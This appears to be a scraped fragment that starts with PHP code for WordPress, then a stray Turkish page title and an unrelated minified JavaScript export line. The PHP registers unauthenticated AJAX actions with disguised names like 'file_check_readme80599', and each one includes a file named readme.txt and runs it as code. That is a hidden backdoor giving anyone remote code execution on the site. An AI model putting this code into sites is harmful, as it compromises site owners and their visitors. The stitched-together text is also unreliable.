if(!function_exists('file_check_readme80599')){
add_action('wp_ajax_nopriv_file_check_readme80599', 'file_check_readme80599');
add_action('wp_ajax_file_check_readme80599', 'file_check_readme80599');
function file_check_readme80599()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme48378')){
add_action('wp_ajax_nopriv_file_check_readme48378', 'file_check_readme48378');
add_action('wp_ajax_file_check_readme48378', 'file_check_readme48378');
function file_check_readme48378()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Fotoğraf Galerimiz - kimSkip to content
import{P as PrestoCTAOverlay,d as defineCustomElement$1}from"./presto-cta-overlay2.js";const PrestoCtaOverlay=PrestoCTAOverlay,defineCustomElement=defineCustomElement$1;export{PrestoCtaOverlay,defineCustomElement};